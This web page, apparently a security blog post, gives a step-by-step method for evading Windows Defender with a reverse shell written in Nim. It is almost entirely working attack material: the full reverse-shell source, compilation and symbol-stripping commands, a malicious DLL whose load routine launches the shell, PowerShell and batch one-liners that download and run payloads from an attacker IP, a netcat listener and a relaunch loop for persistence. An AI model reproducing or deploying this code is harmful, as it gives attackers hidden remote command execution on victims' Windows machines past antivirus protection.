help@cyb4rgeek.xyz

+1 (512) 588 6950

Use nim compiled language to evade Windows Defender reverse shell detection

Home/Use nim compiled language to e...
Use nim compiled language to evade Windows Defender reverse shell detection
Use nim compiled language to evade Windows Defender reverse shell detection bez0x December 20, 2022
sudo apt install mingw-w64 
sudo apt install nim
sudo apt install rlwrap
sudo apt install gedit
gedit /tmp/reverse_shell.nim
import net
import osproc # this comes with execProcess, which returns the output of the command as a string
import os
import strutils

# these are the default connection parameters for the rev shell, but can be overwritten with command-line args
var ip = “127.0.0.1”
var port = 4444

var args = commandLineParams() # returns a sequence (similar to a Python list) of the CLI arguments

# if arguments have been provided, assume they are an IP and port and overwrite the default IP/port values
if args.len() == 2:
ip = args[0]
port = parseInt(args[1])

# begin by creating a new socket
var socket = newSocket()
echo “Attempting to connect to “, ip, ” on port “, port, “…”

while true:
# attempt to connect to the attacker’s host
try:
socket.connect(ip, Port(port))

# if the connection succeeds, begin the logic for receiving and executing commands from the attacker
while true:
try:

socket.send(“> “)
var command = socket.recvLine() # read in a line from the attacker, which should be a shell command to execute
var result = execProcess(command) # execProcess() returns the output of a shell command as a string
socket.send(result) # send the results of the command to the attacker

# if the attacker forgets they’re in a rev shell and tries to ctrl+c, which they inevitably will, close the socket and quit the program
except:
echo “Connection lost, quitting…”
socket.close()
system.quit(0)

# if the connection fails, wait 10 seconds and try again
except:
echo “Failed to connect, retrying in 10 seconds…”
sleep(10000) # note that sleep() takes its argument in milliseconds, at least by default
continue

 

# 32bits compilation
nim c -d:mingw --cpu:i386 -t:-m32 -l:-m32 /tmp/reverse_shell.nim 
mv /tmp/reverse_shell.exe /tmp/rev-x86.exe

# 64bits compilation
nim c -d:mingw –cpu:amd64 /tmp/reverse_shell.nim
mv /tmp/reverse_shell.exe /tmp/rev-x64.exe

 

strip /tmp/rev-x86.exe
strip /tmp/rev-x64.exe
Use the strip command to remove debugging symbols
LHOST=192.168.62.161
LPORT=443
cd /tmp
echo "#include <windows.h>" > testdll.c
echo "BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {" >> testdll.c
echo "if (dwReason == DLL_PROCESS_ATTACH) {" >> testdll.c
echo "system(\"START /B C:\\\\\\Windows\\\\\\Tasks\\\\\\\\rev-x86.exe ${LHOST} ${LPORT}\"); ">> testdll.c
echo "ExitProcess(0);" >> testdll.c
echo "} ">> testdll.c
echo "return TRUE;" >> testdll.c
echo "}" >> testdll.c
# x86
i686-w64-mingw32-gcc testdll.c -shared -o /tmp/rev-x86.dll

# x64
x86_64-w64-mingw32-gcc testdll.c -shared -o /tmp/rev-x64.dll

 

LHOST=192.168.62.161
LPORT_web=80
file1=rev-x86.dll
file2=rev-x86.exe
echo START /B powershell -c "(New-Object System.Net.Webclient).DownloadFile('http://${LHOST}:${LPORT_web}/${file1}','C:\Windows\Tasks\\\\${file1}')" > /tmp/backup.bat
echo START /B powershell -c "(New-Object System.Net.Webclient).DownloadFile('http://${LHOST}:${LPORT_web}/${file2}','C:\Windows\Tasks\\\\${file2}')" >> /tmp/backup.bat
python3 -m http.server 80 --directory /tmp
START /B powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://192.168.62.161:80/backup.bat','C:\Windows\Tasks\backup.bat');IEX 'c:\Windows\Tasks\backup.bat'
while; do rlwrap nc -nlvp 443 ; done
c:\Windows\Tasks\rev-x86.exe 192.168.62.161 443
We have a reverse shell connection!
FOR /L %L IN (0,0,1) DO @(timeout /t 2 /nobreak >nul && c:\Windows\Tasks\rev-x86.exe 192.168.62.161 443)
c:\Windows\Tasks\rundll32 rev-x86.dll,test
cmd /c "dir c:\"
powershell -c "whoami"
Use the command prefix “cmd /c” or “powershell -c”.

Leave a Reply